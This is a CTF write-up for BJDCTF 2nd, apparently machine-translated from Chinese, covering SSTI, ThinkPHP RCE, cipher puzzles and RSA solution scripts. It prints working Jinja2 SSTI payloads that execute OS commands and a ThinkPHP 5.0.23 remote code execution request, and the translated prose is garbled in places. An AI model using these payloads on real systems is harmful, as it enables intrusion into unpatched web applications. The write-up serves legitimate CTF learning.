BJDCTF-WP

BJDCTF 2nd WP

introduction

• Because pro forma, so not much time to do, and it is also a dish, so we did a few questions, here to share it ~ O Hi ( ¯ ▽ ¯ ) bu

[BJDCTF 2nd]fake google

Knowledge Point: SSTI

• The recently trained more, and so is made out of first Web, or test flaskframe ssti, and did not do much now, is in the final reading flagtime some little routine, to base64look to read the file
• I use warnings.catch_warningscarried eval command is executed, the most commonly used Does not seem to find, so look for this
• Or the use of first {{[].__class__.__mro__[1].__subclasses__()}}obtaining sub-class base class, and then directly ctrl+Fto find ways to use the
  
  found, the discovery can not be used directly index()to find an index, so get out of the copy whose index was found to be 169, then
  {{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("whoami").read()')}}
  discovered the successful implementation
  
• The rest is the command execution, directory traversal, read flag, say what this is, read flagtime, read the contents of the file has been filtered, so base64it reads
  {{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("echo cat / flag | base64").read()')}}
  
• Finally decode what you can get flag

[BJDCTF 2nd]old-hack

Knowledge Point: ThinkPHP5.0.23 remote RCE

• This question has been prompted Home, displayed Powered by THINKPHP5, directly associated with tp5vulnerabilities, direct search expplay can be

# ThinkPHP <= 5.0.23、5.1.0 <= 5.1.16 需要开启框架app_debug
POST /
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al

The successful implementation of the remaining flag can be read directly under the root directory

[BJDCTF 2nd] old illiterate

Knowledge Point: brain-dong

• This problem it is added to the brain when the pit hole, directly to the text search, read the alphabet discovered clues, finally pay attention when the flag words deleted braces
  
  flag: BJD {Zhe Jiu raincoat embroidery Lai Copernicium Zhijie pride shad Ba}

[BJDCTF 2nd]cat_flag

Knowledge point: Binary string

• I did not react, then tried to have the chicken as 0, no chicken is denoted by 1, into 01 binary string, then transferred to ASCII code

[BJDCTF 2nd] spirit proficiency in -y1ng

Knowledge Point: variant pigpen cipher

• Variant pigpen cipher, looking at the code table against the change just fine
  

[BJDCTF 2nd] Yan Yan Yan language -y1ng

Knowledge Point: Hex, Virginia password

• First turn the hex string, then Virginia decryption key is yanzi
  

[BJDCTF 2nd]Y1nglish-y1ng

Knowledge Point: Replace password

• Direct online decryption, flag not found, the topic and people release last hint, said the word should correct the error committed, then find the last word should be Cr4ck
  

[BJDCTF 2nd]rsa0

Knowledge: Basic RSA routines, junior high school mathematics

• Substitution equal amounts, the known p + q, pq we need to convert and phi n, and the inverse element d, and finally to solve m
• exp:

# -*- coding:utf-8 -*-
# Author : Konmu
# rsa0

import gmpy2
from Crypto.Util.number import *
#a=p+q b=p-q
a=17162353559144679042138764130392599487619616736304807356650753313511074468547740997240459020330637407607018451370757739841162760390979956823381951345720928
b=2157944102411263994709908806124613607462762078172843352748093273937884682449698667594757978254948952712563313245682739933249064978139449404711197573108846
c=45301241949589301995180160804303973330820405560962297548184980689249607707456658111351805771592837881785351326731109851752124118781776273507359216672384415019593182742168977641581393719509221130849808495779942628017133428896872236441436256500653209906562574669595813780702154561337014309513479940699909759454
e=13881611

n=(a**2-b**2) //4

phi=n-a+1

d=int(gmpy2.invert(e,phi))

m=pow(c,d,n)

print(long_to_bytes(m))

[BJDCTF 2nd]rsa1

Knowledge Point: ditto

• It is still the same amount of substitution
• exp：

# -*- coding:utf-8 -*-
# Author : Konmu
# rsa1

from gmpy2 import iroot,invert
from Crypto.Util.number import *

#p**2+q**2=a
a=230282632694523225937051344416173208141003770756289612804807217657804068791542651564838194212104676551997764018460879226166807005433546876007288091996196539309119708193341213288590014759087592722749150747027103386853090111834756105787095305838589646731702172385691220203268855509181738201501713929481838642498
#p-q=b
b=-4900116095386312405990409603053751102044890401512310635193158977344509279780138297206939893571426574257123980641762453196916366832983541826491201092272814
c=57305478781873469701906886706515374864936174293678370148185292603092343152208523838764818066602190494238364695329068029056956741411335604426893391963871703874286120587046383783936896139251516197205626486457338063805605931966769630762887820549045989322171833789694041829203743398401975653722227935420397574254
e=8671291

n=(b**2-a)//(-2)
temp=2*n+a
temp_1=iroot(temp,2)
#temp_1=20893877754997573728203567845738001284961182394065350971204621396499968057878195283639697317876340959595444095705767445958979789899779232673349184190305080
print(temp_1)
phi=n-temp_1+1
d=int(invert(e,phi))
m=pow(c,d,n)

print(long_to_bytes(m))

to sum up

• Originally intended to take this opportunity to practice what web, but found himself still tcl, and other follow-up after the official wp routines to learn about some of the web